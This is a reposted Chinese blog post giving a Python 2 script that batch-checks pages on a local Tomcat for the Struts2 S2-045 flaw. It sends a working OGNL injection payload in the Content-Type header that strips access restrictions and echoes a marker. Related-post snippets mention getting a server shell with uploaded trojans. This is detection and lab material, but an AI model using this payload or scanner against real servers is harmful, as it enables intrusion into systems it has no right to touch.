【Python】struts2-045批量检测

最新推荐文章于 2024-07-27 02:10:17 发布
最新推荐文章于 2024-07-27 02:10:17 发布
阅读量150 收藏
点赞数
文章标签: python java 移动开发
原文链接:http://www.cnblogs.com/peterpan0707007/p/8734415.html
版权

0x00   环境

存在struts2-045漏洞的war包

apache-tomcat

0x01   脚本

#coding:utf-8

import re
import urllib
import urllib2
import linecache

url="http://127.0.0.1:8080/struts2-rest-showcase/orders.xhtml"
resp=urllib.urlopen(url).read()
data=re.compile(r'href=.+\"\s').findall(resp)
#读取网页中链接
for i in data:
    link='http://127.0.0.1:8080/struts2-rest-showcase/'+i.split('\"')[1]
    # with open('url.txt','a') as fw:
        # fw.write(link+'\n')
    payload="%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
    ua_headers={"user-agent":"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36","Content-Type":payload}
    try:
        req=urllib2.Request(link,headers=ua_headers)
        response=urllib2.urlopen(req).read()
        if '105059592' in response:
            print '存在struts2-045漏洞'+':'+'\t'+link
    except Exception,e:
        print e

我这里简单抓了一下网站的链接,然后批量检测,结果如下图:

 

转载于:https://www.cnblogs.com/peterpan0707007/p/8734415.html

weixin_30419799
关注
Struts2-045 Remote Code Execution Vulnerablity(CVE-2017-5638)复现
薛定谔嘚喵博客
05-30 231
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
vulfocus-struts2 命令执行 (CVE-2016-3081)
Fanny0602的博客
06-16 1995
vulfocus靶场:struts2 命令执行 (CVE-2016-3081)。
Struts2-045验证脚本
weixin_30551963的博客
11-19 154
#! /usr/bin/env python # encoding:utf-8 import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers def poc(): register_opener...
Struts2-045漏洞批量扫描工具
专注企业信息安全-sec
11-23 2792
一个 Struts2-045漏洞批量扫描工具 https://github.com/lijiejie/struts2_045_scan Requirements 1 2 pip install requests   Usage 1 2 3 4 5 6 7 8 9...
Struts2 s2-045
2301_76467680的博客
07-01 490
3.构造poc,使用抓包工具Burpsuite,修改数据包插入poc。把上面的代码粘贴到content-type字段发送显示。同样粘贴到content-type字段。
struts2-045 远程代码执行漏洞(CVE-2017-5638)
rumil的博客
06-02 1394
解析了以后,我们借助第三方工具,来进行生成木马文件,然后进行随意上传文件,进行漏洞检测,然后上传木马文件,获取服务器的shell。接下来我们尝试去上传文件(随便上传),然后抓取数据包,修改数据包,然后观察响应数据的变化。观察上传访问路径,进行复制,使用第三方工具(哥斯拉)进行连接。抓取数据包,修改数据包,查看修改后,收到的响应数据。连接成功,进行添加,进入,成功拿到服务器shell。查看是否能够上传成功,观察到已经上传成功。将随意的文件尝试上传,观察url变化。点击文件上传模块,尝试上传木马文件。
Struts2-057漏洞检测python脚本
11-04
- **自动化扫描**:脚本可以进一步扩展以批量检测多个目标或URL,实现自动化漏洞扫描。 在实际应用中,安全研究人员和渗透测试人员通常会使用这样的脚本来评估他们的Struts2应用程序的安全性。同时,对于拥有Struts...
Struts2-ScanEN:这是来自的翻译项目
04-08
Struts2漏洞利用扫描工具基于Internet上已发布的Structs2高风险漏洞exp的扫描利用工具,当前支持的漏洞如下:S2-001,S2-003,S2-005,S2-007, S2-008,S2-009,S2-012,S2-013,S2-015,S2-016,S2-019,S2-029,...
struts扫描及利用工具(2018-11新版)
11-30
快速检测struts命令执行漏洞,可批量。 # 运行环境 MAC/Linux下的Python2 # 支持对以下版本的检测 ST2-005 ST2-008 ST2-009 ST2-013 ST2-016 ST2-019 ST2-020 ST2-devmode ST2-032 ST2-033 ST2-037 ST...
struts漏洞检测工具
11-08
struts2 漏洞检测工具 ,快速检测struts命令执行...支持ST2-005,ST2-008,ST2-009,ST2-013,ST2-016,ST2-019,ST2-020,ST2-devmode,ST2-032,ST2-033,ST2-037,ST2-045,ST2-046,ST2-048,ST2-052,ST2-053,ST2-057的漏洞检测
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
Struts2-045漏洞利用工具
08-11
Struts2-045漏洞利用工具
Struts2 045漏洞S2-045漏洞利用工具python 视图版
03-07
Struts2 045漏洞S2-045漏洞利用工具python 视图版 执行python exp.py后 自动弹出对话框
struts2接受表单传过来的用户名和密码
03-16
struts2接受表单传过来的用户名和密码
nmap实现 自动发现web漏洞的思路
weixin_34362875的博客
05-31 737
2019独角兽企业重金招聘Python工程师标准>>> ...
Struts2-045分析(CVE-2017-5638)
xiao190128的专栏
03-10 3901
漏洞简介 漏洞名称:Struts2-045 漏洞类型:远程执行命令 漏洞等级:高危 漏洞原因:基于Jakarta Multipart parser的文件上传模块在处理文件上传(multipart)的请求时候对异常信息做了捕获,并对异常信息做了OGNL表达式处理。但在在判断content-type不正确的时候会抛出异常并且带上Content-Type属性值,可通过精心构造附带OGNL表达式的
Struts2 S2-045远程执行代码漏东
最新发布
weixin_42503415的博客
07-27 126
Struts2 S2-045远程执行代码漏懂允许公鸡者通过创建恶意的HTTP请求来远程执行系统命令。具体来说,S2-045漏懂是因为在使用基于Jakarta插件的文件上传功能时,Struts2框架未能正确处理用户输入的错误信息。当进行文件上传时,如果恶意用户修改了HTTP请求头中的Content-Type值,这可能会触发异...
Struts2 S2-045 远程代码执行漏洞(CVE-2017-5638)
qq_68163788的博客
06-24 1022
Struts2是一个基于MVC设计模式的流行且成熟的Web应用程序框架. Struts2不仅仅是Struts 1的新版本,它完全重写了Struts架构.Webwork框架最初以Struts框架为基础,其目标是提供一个基于Struts的增强和改进的框架,使开发人员更容易进行Web开发.过了一段时间,Webwork框架和Struts社区携手创建着名的Struts2框架.(也可以将struts2比作于一个大的servlet当基于Jakarta插件上传文件时,可导致远程代码执行。
利用Python实现ArcGIS Add-in批量截图功能
资源摘要信息: "python arcgis add-in wizard 批量根据图层要素进行逐个截图,批量截图,批量截影像" 该资源提供了一个使用Python语言和ArcGIS的Add-In Wizard创建的工具,其功能是批量地根据ArcGIS中的图层要素...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值